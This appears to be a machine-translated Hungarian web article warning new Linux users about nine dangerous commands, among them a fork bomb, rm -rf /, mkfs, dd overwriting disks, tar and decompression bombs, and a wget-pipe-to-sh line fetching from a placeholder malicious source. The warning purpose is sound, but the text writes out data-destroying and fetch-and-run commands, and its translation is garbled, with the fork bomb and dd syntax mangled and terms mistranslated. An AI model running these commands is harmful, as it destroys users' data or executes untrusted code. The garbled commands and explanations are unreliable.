Homepage » Desktop » 9 Linux parancsok és kódok, amelyekkel óvatosnak kell lennie

    9 Linux parancsok és kódok, amelyekkel óvatosnak kell lennie

    A Linux shell / terminál parancsok nagyon erősek és csak egy egyszerű parancs egy mappát, fájlokat vagy gyökérmappát stb.

    Bizonyos esetekben a Linux nem fogja kérni a megerősítést, hanem azonnal végrehajtja a parancsot, ami miatt értékes adatokat és információkat veszít tárolja ezeket a fájlokat és mappákat.

    Gyakran előfordul, hogy az emberek közzéteszik a tartalmat az interneten új Linux-felhasználóknak javasolják ezeket a parancsokat. Ez úgy tűnik, mintha vicc lenne valaki számára, aki közzétette a tartalmat, de a másik végén nem a nevető személy.

    Néhány Linux parancsot gyűjtöttünk össze, amelyek eléggé károsak a rendszerünkre, hogy elkerüljék őket. Ne feledje, hogy valóban veszélyesek és az új parancsok előállítására számos módon módosítható több kárt okoz.

    Fontos megjegyezni, hogy Ezek a parancsok csak akkor veszélyesek, ha az Ubuntu-nál sudo-val vannak előtagokkal. Míg más Linux-disztribúciókban ezek a megadott parancsok többsége veszélyes lesz, hogy rootként végrehajtsa.

    Vessen egy pillantást a 9 parancs és kód el kell kerülnie a végrehajtást.

    1. Linux Fork Bomb Command

    : () : |: & ;: más néven Villás bomba a Linux rendszer ellen irányuló szolgáltatásmegtagadási támadás. : () : |: & ;: egy bash funkció. Miután végrehajtották, többször megismétli magát, amíg a rendszer lefagy.

    Csak akkor lehet megszabadulni tőle, ha újraindítja a rendszert. Tehát légy óvatos, ha végrehajtja ezt a parancsot a Linux shellen.

    2. mv mappa / dev / null Parancs

    mv mappa / dev / null egy másik kockázatos parancs. Dev / null vagy null eszköz jelentése olyan eszközfájl, amely eldobja az összes rá írt adatot, de azt jelzi, hogy az írási művelet sikeresen végrehajtásra kerül. Ez is ismert kicsit csattan vagy fekete lyuk.

    3. rm -rf parancs

    rm -rf parancs egy gyors út töröljön egy mappát és annak tartalmát Linux operációs rendszerben. Ha nem tudja, hogyan kell megfelelően használni, akkor nagyon veszélyes lehet a rendszerre. Az rm-rf paranccsal leggyakrabban használt kombinációk és opciók az alábbiak:

    • rm parancsot használ a fájlok Linux rendszerben való törlésére.
    • rm -f parancs eltávolítja az írásvédett fájlokat a mappában.
    • rm -r parancs rekurzívan törli a mappa tartalmát.
    • rm -d parancsot használ egy üres könyvtár eltávolítására, de elutasítja a könyvtár eltávolítását, ha nem üres.
    • rm -rf / A parancsot a kényszer törléshez használják (ez törli azt még akkor is, ha az írásvédett) a gyökérkönyvtár és az almappák összes tartalmáról.
    • rm -rf * A parancsot az aktuális könyvtárban lévő összes tartalom (könyvtár, amely jelenleg dolgozik) és az almappák kényszer törlésére használják.
    • rm -rf. a parancs az aktuális mappa és almappák összes tartalmának kényszer törlésére szolgál. A rm -r. [^.] * parancs is használható.
    • rm -i parancsot használ a fájlok és mappák eltávolítására, de az eltávolítás előtt megjelenik egy kérés.

    4. mkfs parancs

    mkfs veszélyes parancs lehet a Linux alapú rendszerre, ha nem ismeri a célját. Bármi, amit az mkfs után írtunk, egy üres Linux fájlrendszerrel lesz formázva és helyettesítve.

    Az alábbi parancsok formázzák a merevlemezt, és rendszergazdai jogokat igényelnek:

    • mkfs
    • mkfs.ext3
    • mkfs.bfs
    • mkfs.ext2
    • mkfs.minix
    • mkfs.msdos
    • mkfs.reiserfs
    • mkfs.vfat

    A parancs mkfs.cramfs ugyanaz lesz, mint a fenti, de nem igényel adminisztrátori jogokat végrehajtani.

    5. Tar bomba

    A kátrány parancsot használ a több fájl egyetlen fájlba (archivált fájlba) történő \ t .kátrány formátum. Ezzel a paranccsal létrehozható egy szalag archívum (tar) bomba.

    Ez egy archív fájl, amely több ezer vagy több millió fájlba robbant, amelyek a meglévő fájlokhoz hasonló neveket tartalmaznak az aktuális könyvtárban ahelyett, hogy egy új könyvtárba kerülne.

    Elkerülheti, hogy a tar bomba áldozatává váljon rendszeresen hozzon létre egy új védelmi könyvtárat, amikor egy tar fájlt kap és aztán a fogadott tar fájl áthelyezése ebbe a könyvtárba, mielőtt eltávolítaná.

    Ha a tar fájl valóban tar bomba, akkor egyszerűen eltávolíthatja az újonnan létrehozott könyvtárat, hogy megszabaduljon róla. Egy másik módja annak, hogy elkerüljük a kátránybomba robbanását a -t lehetőség a tar fájl tartalmának felsorolására adj egy ötletet a tar fájlban található tartalom típusáról.

    6. dd parancs

    A dd parancsot használ a merevlemez-partíciók másolása és konvertálása. Ez azonban káros lehet, ha helytelen helyet ad meg.

    A parancs bármelyike ​​lehet:

    • dd if = / dev / hda = = dev / hdb
    • dd if = / dev / hda = / dev / sdb
    • dd if = valami = / dev / hda
    • dd if = valami = / dev / sda

    A következő parancs nullázza az egész elsődleges merevlemezt: dd if = / dev / nulla = / dev / volt

    7. Shell Script kód

    Valaki áldozhat meg megadja a linket egy shell parancsfájlhoz, és jóváhagyja, hogy letöltse és végrehajtja azt. A parancsfájl tartalmazhat egy rosszindulatú vagy veszélyes kódot. A parancsformátum így nézhet ki: wget http: // some_malicious_source -O- | SH. A wget letölti a szkriptet, míg a sh letölti a parancsfájl végrehajtását.

    8. Rosszindulatú forráskód

    Valaki megadja a forráskódot, és kéri, hogy fordítsa le. A kód normális kódnak tűnhet, de valójában néhány rosszindulatú kódot rejtenek a nagy forráskódban és ez károsíthatja a rendszert. Annak érdekében, hogy elkerüljék az ilyen támadások áldozatait, csak a forráskódot fogadja el megbízható forrásból.

    9. Dekompressziós bomba

    Egy tömörített fájlt kapott, és felkérik, hogy kivonja ezt a fájlt, amely nagyon kicsi, de néhány KB lehet. Valójában, ez a kis méretű tömörített fájl nagyon tömörített adatokat tartalmaz.

    Miután a fájlt kicsomagoltuk, több száz GB adat kerül kitermelésre kitöltheti a merevlemezt hogy csökkentse a rendszer teljesítményét. A helyzet elkerülése érdekében mindig emlékezzen arra, hogy megbízható forrásból származó adatokat fogad el.